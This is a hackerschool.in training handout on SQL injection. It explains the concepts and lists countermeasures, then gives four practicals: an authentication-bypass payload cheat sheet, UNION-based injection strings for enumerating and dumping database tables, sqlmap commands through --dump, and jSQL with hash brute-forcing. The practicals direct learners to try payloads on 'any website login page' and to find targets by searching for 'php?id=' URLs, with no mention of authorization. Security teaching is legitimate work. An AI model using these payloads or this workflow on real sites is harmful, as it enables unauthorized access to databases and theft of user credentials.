www.hackerschool.

in
www.hackerschool.in
SQL
SQL (Structured Query Language) is a database management language used
to manage databases to perform various operations like create, read, update and
delete on the database. SQL is used by database administrators, as well as
developers to organize user data properly. Web applications interact with the
database server in the form of queries. SQL queries include select, add, insert,
update, delete, create, alter and truncate.

List of Database software

● MySQL
● Microsoft SQL
● Oracle
● MongoDB
● SQL lite
● Microsoft Access
● DB2 Express-C

Database
A database is a collection of information that is organized into rows, columns, and
tables, and it is indexed so that it can be easily accessed, managed and updated.
Data in the database gets updated, expanded and deleted as new information is
added.

The relation between the Web server and Database server

A server is a software that runs continuously and responds to requests sent
by the clients, Communication between a client and a server happens using a
specific protocol example HTTP, HTTPS Server running web application include
three components like
Web servers which primarily respond to HTTP / HTTPS requests sent by
the clients and passes these requests on to handlers.
Application server handles requests to create dynamic web pages. The
application server processes the user request to generate the HTML page for the
end user, instead of serving a static HTML page stored on the disk. Application
server software runs on the same physical server machine as where the web server
is running.
The database server is a server which houses a database application like
JDBC, ODBC to provide database services to other computer programs. Most
database applications respond to a query language. Each database understands its

www.hackerschool.in
query language and converts each submitted query to server-readable form and
executes it to retrieve results.
The relation between the web server and the database server are the web
server uses the application server to retrieve the data from the database and host
the data with the help of the web server application. So web server works as the
front end, and database server works as a backend to provide data to web server.

SQL Injection
The technique used to take advantage of non-validated input vulnerabilities
to pass SQL commands through a web application for execution on backend
database to retrieve information directly from the database. It is used to gain
unauthorized access to the database. SQL Injection is not a vulnerability in
database or web server; it is a vulnerability in a web application which occurs due
to lack of input validation.

Types of SQL Injection attacks

● Authentication bypass attack
● Error-based SQL Injection
● Blind SQL Injection

www.hackerschool.in
Authentication bypass attack
The attacker uses this technique to bypass user authentication without
providing the valid Username and password and tries to log into a web application
with administrative privileges.

Authentication Bypass Cheat Sheet

1’ or ‘1’ = ‘1 admin' or 1=1
or 1=1 admin' or 1=1--
or 1=1-- admin' or 1=1#
or 1=1# admin' or 1=1/*
or 1=1/* admin') or ('1'='1
admin' -- admin') or ('1'='1'--
admin' # admin') or ('1'='1'#
admin'/* admin') or ('1'='1'/*
admin' or '1'='1 admin') or '1'='1
admin' or '1'='1'-- admin') or '1'='1'--
admin' or '1'='1'# admin') or '1'='1'#
admin' or '1'='1'/* admin') or '1'='1'/*
admin' or 1=1 or ''='

Error-based SQL Injection

Error-based SQL injection technique relies on error messages thrown by the
database server to obtain information about the structure of the database. In some
cases, error-based SQL injection alone is enough for an attacker to enumerate an
entire database. While errors are very useful during the development phase of a
web application, they should be disabled on a live site or logged to a file with
restricted access instead. By analyzing these errors, the attacker can grab system
information such as the database, database version, OS, etc.

www.hackerschool.in
Blind SQL injection
Blind SQL injection is a type of SQL Injection attack that queries the
database true or false questions and determines the answer based on the
applications response. This attack is often used when the web application is
configured to show generic error messages but has not mitigated the code that is
vulnerable to SQL injection. Blind SQL injection is nearly identical to normal SQL
Injection, the only difference being the way the data is retrieved from the database.

Countermeasures
● Never trust user input. Sanitize and validate all input fields. Use
parameterized statements, separate data from SQL code.
● Reject entries that contain binary data, escape sequences and comment
characters.
● Checking the privileges of a user’s connection to the database.
● Use secure hash algorithms to secure user passwords stored in the database.
● Perform source code review before hosting website.

References:
1. Types of SQL Injection? (n.d.). Retrieved from
https://www.acunetix.com/websitesecurity/sql-injection2/
2. Blind SQL Injection. (n.d.). Retrieved from
https://www.owasp.org/index.php/Blind_SQL_Injection
3. https://portswigger.net/web-security/sql-injection

www.hackerschool.in
 INDEX
S. No. Practical Name Page No.
1 SQL Injection Authentication Bypass Method 1
2 Error-based SQL Injection 2
3 Performing SQL Injection with SQL map tool 7
4 Performing SQL Injection with JSQL tool 10

THIS DOCUMENT INCLUDES ADDITIONAL PRCTICALS WHICH MAY OR MAY NOT BE COVERED DURING
CLASSROOM TRAINING. FOR MORE DETAILS APPROACH LAB COORDINATORS
 Practical 1: SQL Injection Authentication Bypass Method
Description: In this practical you will learn how to bypass the authentication of web
applications if that application has SQL injection vulnerability, and different operators to
use to try to bypass authentication.

Step 1: Consider any website login page. Enter this string 1’ or ‘1’ = ‘1 in both
username and password fields. If the target web application is vulnerable to the SQL
injection, we can gain access to the administrator account.

1|Page
www.hackerschool.in
 Practical 2: Error-based SQL Injection
Description: In this practical you will learn how to identify a web application has SQL
injection vulnerability or not based on the errors it will give if we make a small change
to the URL portion. And also learn, if vulnerability is there, how to exploit the
vulnerability to extract the information from the database.

Step 1: We can search for web pages vulnerable to SQL injection using following
search query
● php?id=

Step 2: Enter single quote (') at the end of URL to test SQL injection vulnerability in
the webpage. If it displays an error related to SQL in the webpage, it is vulnerable to
SQL injection. Append order by 1-- in the URL.

2|Page
www.hackerschool.in
Step 3: Increase the number by 1 every time until webpage loads normally without any
error. We can even try the following technique to identify a number of columns.
● php?id=6’ order by 3--+

Step 4: In this case, the website displays error until order by 7-- this indicates there are
6 columns in the database. Now let us identify vulnerable columns by appending below
query to the URL.
● union select (list of columns)--
● Example: union select 1,2,3,4,5,6--

3|Page
www.hackerschool.in
Step 5: In this case, we tried the following technique to identify vulnerable columns.
● Example: php?id=-6 union select 1,2,3,4,5,6--

Step 6: From the above result. It is observed that 3rd and 4th columns are vulnerable. To
know the version of database server, replace column number with version () as shown in
the below image.

4|Page
www.hackerschool.in
Step 7: To retrieve database information including table names.
● php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7 from
Information_ schema.tables where table_schema=database()--

Step 8: To extract the column names

● php?id=-1 union select 1,2,group_concat(column_name),4,5,6,7 from
information_
schema.columns where table_name=table name

5|Page
www.hackerschool.in
Step 9: The above technique fails to retrieve excepted information. So, let us try to
encode the column name
● php?id=-1 union select 1,2,group_concat(column_name),4,5,6,7 from
information_ schema.columns where table_name=CHAR(97, 100, 109, 105,
110)--

Step 10: To retrieve the data from the columns.

● php?id=-1 union select 1,2,group_concat(column name),4,5,6,7 from
(table_name)--

6|Page
www.hackerschool.in
 Practical 3: Performing SQL Injection with SQL map tool.
Description: In this practical you will learn how to automate the steps that we
performed in the second practical using S
QL map tool (a terminal based tool), if we identified SQL injection vulnerability in any
web application.

Step 1: Open terminal and execute the following command.

● Syntax: sqlmap –u <URL of the vulnerable website> --dbs

7|Page
www.hackerschool.in
Step 2: It will check for the SQL vulnerability. If it is vulnerable, it will identify target
SQL server database information.

Step 3: To retrieve the table names from database, execute below command
● sqlmap –u <URL of the vulnerable website> -D <database> --tables

8|Page
www.hackerschool.in
Step 4: Next, to extract columns from the tables, execute following command
● sqlmap –u <URL of the vulnerable website> -D <database> -T <table name>
--columns

9|Page
www.hackerschool.in
Step 5: To extract the content from the selected columns in tables
● sqlmap –u <URL of the vulnerable website> -D <database> -T <table name>
-C <columnnames> --dump

10 | P a g e
www.hackerschool.in
Step 6: Tool will try to perform Dictionary-based attack on stored hashes to identify
plain text password.

11 | P a g e
www.hackerschool.in
 Practical 4: Performing SQL Injection with JSQL tool.
Description: In this practical you will learn how to use jSQL tool, automated graphical
interface tool, to perform SQL injection on the web applications.

Step 1: Select JSQL tool from the applications menu. JSQL will automate the process
of identifying SQL injection vulnerability on a website. Provide URL of a website
vulnerable to SQL injection to start the process of identifying database information.

12 | P a g e
www.hackerschool.in
Step 2: After completing the extraction of data, select a table to extract contents as
shown in the below image.

13 | P a g e
www.hackerschool.in
Step 3: We can use the inbuilt Brute force tool to decrypt the encrypted passwords.

14 | P a g e
www.hackerschool.in